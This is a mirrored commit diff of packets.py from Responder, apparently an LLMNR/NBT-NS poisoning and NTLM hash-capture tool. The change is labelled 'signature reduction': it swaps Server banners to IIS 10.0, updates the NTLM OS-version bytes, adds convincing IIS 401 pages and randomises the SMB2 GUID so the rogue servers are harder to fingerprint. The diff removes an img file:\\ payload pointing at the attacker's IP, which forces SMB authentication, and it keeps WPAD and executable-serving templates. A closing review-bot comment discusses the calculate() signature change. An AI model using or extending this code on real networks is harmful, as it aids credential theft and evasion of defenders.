mirror of
https://github.com/lgandx/Responder.git
synced 2025-07-06 04:51:23 -07:00
Fixed issue in http srv, more hashes & signature reduction.
parent
08e44d72ac
commit
66ee7f8f08
3 changed files with 147 additions and 35 deletions
132
packets.py
|
@ -365,7 +365,7 @@ class NTLM_Challenge(Packet):
|
|||
("TargetInfoLen", "\x7e\x00"),
|
||||
("TargetInfoMaxLen", "\x7e\x00"),
|
||||
("TargetInfoOffset", "\x3e\x00\x00\x00"),
|
||||
("NTLMOsVersion", "\x05\x02\xce\x0e\x00\x00\x00\x0f"),
|
||||
("NTLMOsVersion", "\x0a\x00\x7c\x4f\x00\x00\x00\x0f"),
|
||||
("TargetNameStr", settings.Config.Domain),
|
||||
("Av1", "\x02\x00"),#nbt name
|
||||
("Av1Len", "\x06\x00"),
|
||||
|
@ -426,25 +426,59 @@ class NTLM_Challenge(Packet):
|
|||
class IIS_Auth_401_Ans(Packet):
|
||||
fields = OrderedDict([
|
||||
("Code", "HTTP/1.1 401 Unauthorized\r\n"),
|
||||
("ServerType", "Server: Microsoft-IIS/7.5\r\n"),
|
||||
("Date", "Date: "+HTTPCurrentDate()+"\r\n"),
|
||||
("Type", "Content-Type: text/html\r\n"),
|
||||
("WWW-Auth", "WWW-Authenticate: NTLM\r\n"),
|
||||
("Len", "Content-Length: 0\r\n"),
|
||||
("CRLF", "\r\n"),
|
||||
("ServerType", "Server: Microsoft-IIS/10.0\r\n"),
|
||||
("Date", "Date: "+HTTPCurrentDate()+"\r\n"),
|
||||
("WWW-Auth", "WWW-Authenticate: Negotiate\r\n"),
|
||||
("WWW-Auth2", "WWW-Authenticate: NTLM\r\n"),
|
||||
("Len", "Content-Length: "),
|
||||
("ActualLen", "76"),
|
||||
("CRLF", "\r\n\r\n"),
|
||||
("Payload", """<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
|
||||
<html xmlns="http://www.w3.org/1999/xhtml">
|
||||
<head>
|
||||
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>
|
||||
<title>401 - Unauthorized: Access is denied due to invalid credentials.</title>
|
||||
<style type="text/css">
|
||||
<!--
|
||||
body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}
|
||||
fieldset{padding:0 15px 10px 15px;}
|
||||
h1{font-size:2.4em;margin:0;color:#FFF;}
|
||||
h2{font-size:1.7em;margin:0;color:#CC0000;}
|
||||
h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}
|
||||
#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;
|
||||
background-color:#555555;}
|
||||
#content{margin:0 0 0 2%;position:relative;}
|
||||
.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}
|
||||
-->
|
||||
</style>
|
||||
</head>
|
||||
<body>
|
||||
<div id="header"><h1>Server Error</h1></div>
|
||||
<div id="content">
|
||||
<div class="content-container"><fieldset>
|
||||
<h2>401 - Unauthorized: Access is denied due to invalid credentials.</h2>
|
||||
<h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3>
|
||||
</fieldset></div>
|
||||
</div>
|
||||
</body>
|
||||
</html>
|
||||
"""),
|
||||
])
|
||||
def calculate(self):
|
||||
self.fields["ActualLen"] = len(str(self.fields["Payload"]))
|
||||
|
||||
class IIS_Auth_Granted(Packet):
|
||||
fields = OrderedDict([
|
||||
("Code", "HTTP/1.1 200 OK\r\n"),
|
||||
("ServerType", "Server: Microsoft-IIS/7.5\r\n"),
|
||||
("ServerType", "Server: Microsoft-IIS/10.0\r\n"),
|
||||
("Date", "Date: "+HTTPCurrentDate()+"\r\n"),
|
||||
("Type", "Content-Type: text/html\r\n"),
|
||||
("WWW-Auth", "WWW-Authenticate: NTLM\r\n"),
|
||||
("ContentLen", "Content-Length: "),
|
||||
("ActualLen", "76"),
|
||||
("CRLF", "\r\n\r\n"),
|
||||
("Payload", "<html>\n<head>\n</head>\n<body>\n<img src='file:\\\\\\\\\\\\"+RespondWithIP()+"\\smileyd.ico' alt='Loading' height='1' width='2'>\n</body>\n</html>\n"),
|
||||
("Payload", ""),
|
||||
])
|
||||
def calculate(self):
|
||||
self.fields["ActualLen"] = len(str(self.fields["Payload"]))
|
||||
|
@ -452,22 +486,29 @@ class IIS_Auth_Granted(Packet):
|
|||
class IIS_NTLM_Challenge_Ans(Packet):
|
||||
fields = OrderedDict([
|
||||
("Code", "HTTP/1.1 401 Unauthorized\r\n"),
|
||||
("ServerType", "Server: Microsoft-IIS/7.5\r\n"),
|
||||
("ServerType", "Server: Microsoft-IIS/10.0\r\n"),
|
||||
("Date", "Date: "+HTTPCurrentDate()+"\r\n"),
|
||||
("Type", "Content-Type: text/html\r\n"),
|
||||
("WWWAuth", "WWW-Authenticate: NTLM "),
|
||||
("Payload", ""),
|
||||
("Payload-CRLF", "\r\n"),
|
||||
("Len", "Content-Length: 0\r\n"),
|
||||
("CRLF", "\r\n"),
|
||||
("ContentLen", "Content-Length: "),
|
||||
("ActualLen", "76"),
|
||||
("CRLF", "\r\n\r\n"),
|
||||
("Payload2", """<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd">
|
||||
<HTML><HEAD><TITLE>Not Authorized</TITLE>
|
||||
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD>
|
||||
<BODY><h2>Not Authorized</h2>
|
||||
<hr><p>HTTP Error 401. The requested resource requires user authentication.</p>
|
||||
</BODY></HTML>
|
||||
"""),
|
||||
])
|
||||
|
||||
def calculate(self,payload):
|
||||
self.fields["Payload"] = b64encode(payload)
|
||||
def calculate(self):
|
||||
self.fields["ActualLen"] = len(str(self.fields["Payload2"]))
|
||||
|
||||
class WinRM_NTLM_Challenge_Ans(Packet):
|
||||
fields = OrderedDict([
|
||||
("Code", "HTTP/1.1 401 \r\n"),
|
||||
("Code", "HTTP/1.1 401\r\n"),
|
||||
("WWWAuth", "WWW-Authenticate: Negotiate "),
|
||||
("Payload", ""),
|
||||
("Payload-CRLF", "\r\n"),
|
||||
|
@ -483,21 +524,52 @@ class WinRM_NTLM_Challenge_Ans(Packet):
|
|||
class IIS_Basic_401_Ans(Packet):
|
||||
fields = OrderedDict([
|
||||
("Code", "HTTP/1.1 401 Unauthorized\r\n"),
|
||||
("ServerType", "Server: Microsoft-IIS/7.5\r\n"),
|
||||
("Date", "Date: "+HTTPCurrentDate()+"\r\n"),
|
||||
("ServerType", "Server: Microsoft-IIS/10.0\r\n"),
|
||||
("Type", "Content-Type: text/html\r\n"),
|
||||
("WWW-Auth", "WWW-Authenticate: Basic realm=\"Authentication Required\"\r\n"),
|
||||
("AllowOrigin", "Access-Control-Allow-Origin: *\r\n"),
|
||||
("AllowCreds", "Access-Control-Allow-Credentials: true\r\n"),
|
||||
("Len", "Content-Length: 0\r\n"),
|
||||
("CRLF", "\r\n"),
|
||||
("Date", "Date: "+HTTPCurrentDate()+"\r\n"),
|
||||
("Len", "Content-Length: "),
|
||||
("ActualLen", "76"),
|
||||
("CRLF", "\r\n\r\n"),
|
||||
("Payload", """<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
|
||||
<html xmlns="http://www.w3.org/1999/xhtml">
|
||||
<head>
|
||||
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>
|
||||
<title>401 - Unauthorized: Access is denied due to invalid credentials.</title>
|
||||
<style type="text/css">
|
||||
<!--
|
||||
body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}
|
||||
fieldset{padding:0 15px 10px 15px;}
|
||||
h1{font-size:2.4em;margin:0;color:#FFF;}
|
||||
h2{font-size:1.7em;margin:0;color:#CC0000;}
|
||||
h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}
|
||||
#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;
|
||||
background-color:#555555;}
|
||||
#content{margin:0 0 0 2%;position:relative;}
|
||||
.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}
|
||||
-->
|
||||
</style>
|
||||
</head>
|
||||
<body>
|
||||
<div id="header"><h1>Server Error</h1></div>
|
||||
<div id="content">
|
||||
<div class="content-container"><fieldset>
|
||||
<h2>401 - Unauthorized: Access is denied due to invalid credentials.</h2>
|
||||
<h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3>
|
||||
</fieldset></div>
|
||||
</div>
|
||||
</body>
|
||||
</html>
|
||||
"""),
|
||||
])
|
||||
def calculate(self):
|
||||
self.fields["ActualLen"] = len(str(self.fields["Payload"]))
|
||||
|
||||
##### Proxy mode Packets #####
|
||||
class WPADScript(Packet):
|
||||
fields = OrderedDict([
|
||||
("Code", "HTTP/1.1 200 OK\r\n"),
|
||||
("ServerType", "Server: Microsoft-IIS/7.5\r\n"),
|
||||
("ServerType", "Server: Microsoft-IIS/10.0\r\n"),
|
||||
("Date", "Date: "+HTTPCurrentDate()+"\r\n"),
|
||||
("Type", "Content-Type: application/x-ns-proxy-autoconfig\r\n"),
|
||||
("ContentLen", "Content-Length: "),
|
||||
|
@ -514,7 +586,7 @@ class ServeExeFile(Packet):
|
|||
("ContentType", "Content-Type: application/octet-stream\r\n"),
|
||||
("LastModified", "Last-Modified: "+HTTPCurrentDate()+"\r\n"),
|
||||
("AcceptRanges", "Accept-Ranges: bytes\r\n"),
|
||||
("Server", "Server: Microsoft-IIS/7.5\r\n"),
|
||||
("Server", "Server: Microsoft-IIS/10.0\r\n"),
|
||||
("ContentDisp", "Content-Disposition: attachment; filename="),
|
||||
("ContentDiFile", ""),
|
||||
("FileCRLF", ";\r\n"),
|
||||
|
@ -536,7 +608,7 @@ class ServeHtmlFile(Packet):
|
|||
("ContentType", "Content-Type: text/html\r\n"),
|
||||
("LastModified", "Last-Modified: "+HTTPCurrentDate()+"\r\n"),
|
||||
("AcceptRanges", "Accept-Ranges: bytes\r\n"),
|
||||
("Server", "Server: Microsoft-IIS/7.5\r\n"),
|
||||
("Server", "Server: Microsoft-IIS/10.0\r\n"),
|
||||
("ContentLen", "Content-Length: "),
|
||||
("ActualLen", "76"),
|
||||
("Date", "\r\nDate: "+HTTPCurrentDate()+"\r\n"),
|
||||
|
@ -551,7 +623,7 @@ class ServeHtmlFile(Packet):
|
|||
class WPAD_Auth_407_Ans(Packet):
|
||||
fields = OrderedDict([
|
||||
("Code", "HTTP/1.1 407 Unauthorized\r\n"),
|
||||
("ServerType", "Server: Microsoft-IIS/7.5\r\n"),
|
||||
("ServerType", "Server: Microsoft-IIS/10.0\r\n"),
|
||||
("Date", "Date: "+HTTPCurrentDate()+"\r\n"),
|
||||
("Type", "Content-Type: text/html\r\n"),
|
||||
("WWW-Auth", "Proxy-Authenticate: NTLM\r\n"),
|
||||
|
@ -567,7 +639,7 @@ class WPAD_Auth_407_Ans(Packet):
|
|||
class WPAD_NTLM_Challenge_Ans(Packet):
|
||||
fields = OrderedDict([
|
||||
("Code", "HTTP/1.1 407 Unauthorized\r\n"),
|
||||
("ServerType", "Server: Microsoft-IIS/7.5\r\n"),
|
||||
("ServerType", "Server: Microsoft-IIS/10.0\r\n"),
|
||||
("Date", "Date: "+HTTPCurrentDate()+"\r\n"),
|
||||
("Type", "Content-Type: text/html\r\n"),
|
||||
("WWWAuth", "Proxy-Authenticate: NTLM "),
|
||||
|
@ -583,7 +655,7 @@ class WPAD_NTLM_Challenge_Ans(Packet):
|
|||
class WPAD_Basic_407_Ans(Packet):
|
||||
fields = OrderedDict([
|
||||
("Code", "HTTP/1.1 407 Unauthorized\r\n"),
|
||||
("ServerType", "Server: Microsoft-IIS/7.5\r\n"),
|
||||
("ServerType", "Server: Microsoft-IIS/10.0\r\n"),
|
||||
("Date", "Date: "+HTTPCurrentDate()+"\r\n"),
|
||||
("Type", "Content-Type: text/html\r\n"),
|
||||
("WWW-Auth", "Proxy-Authenticate: Basic realm=\"Authentication Required\"\r\n"),
|
||||
|
@ -600,7 +672,7 @@ class WEBDAV_Options_Answer(Packet):
|
|||
fields = OrderedDict([
|
||||
("Code", "HTTP/1.1 200 OK\r\n"),
|
||||
("Date", "Date: "+HTTPCurrentDate()+"\r\n"),
|
||||
("ServerType", "Server: Microsoft-IIS/7.5\r\n"),
|
||||
("ServerType", "Server: Microsoft-IIS/10.0\r\n"),
|
||||
("Allow", "Allow: GET,HEAD,POST,OPTIONS,TRACE\r\n"),
|
||||
("Len", "Content-Length: 0\r\n"),
|
||||
("Keep-Alive:", "Keep-Alive: timeout=5, max=100\r\n"),
|
||||
|
@ -688,7 +760,7 @@ class MSSQLNTLMChallengeAnswer(Packet):
|
|||
("TargetInfoLen", "\x7e\x00"),
|
||||
("TargetInfoMaxLen", "\x7e\x00"),
|
||||
("TargetInfoOffset", "\x3e\x00\x00\x00"),
|
||||
("NTLMOsVersion", "\x05\x02\xce\x0e\x00\x00\x00\x0f"),
|
||||
("NTLMOsVersion", "\x0a\x00\x7c\x4f\x00\x00\x00\x0f"),
|
||||
("TargetNameStr", settings.Config.Domain),
|
||||
("Av1", "\x02\x00"),#nbt name
|
||||
("Av1Len", "\x06\x00"),
|
||||
|
@ -1696,7 +1768,7 @@ class SMB2NegoAns(Packet):
|
|||
("Signing", "\x01\x00"),
|
||||
("Dialect", "\xff\x02"),
|
||||
("Reserved", "\x00\x00"),
|
||||
("Guid", "\xee\x85\xab\xf7\xea\xf6\x0c\x4f\x92\x81\x92\x47\x6d\xeb\x76\xa9"),
|
||||
("Guid", urandom(16).decode('latin-1')),
|
||||
("Capabilities", "\x07\x00\x00\x00"),
|
||||
("MaxTransSize", "\x00\x00\x10\x00"),
|
||||
("MaxReadSize", "\x00\x00\x10\x00"),
|
||||
|
|
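Review bot: In `IIS_NTLM_Challenge_Ans`, `calculate` appears to change from `calculate(self, payload)`, which stored `b64encode(payload)` in `Payload`, to a zero-argument `calculate(self)` that only sets `ActualLen` from `Payload2`. The rendering has lost the +/- markers, so this reading is inferred from the print order. If that is right, any call site still passing the challenge raises `TypeError`, and the caller must now base64-encode the challenge and set `Payload` itself; those call sites are outside this file section and should be checked against the new signature. The `("ActualLen", "76")` default in the reworked 401 classes is only a placeholder, so a packet serialized without `calculate()` would send a `Content-Length` that does not match its body. Note too that `len(str(...))` counts characters rather than encoded bytes. I would document the contract on each `calculate`, for example `"""Set ActualLen from the HTML body; must be called before the packet is serialized."""`.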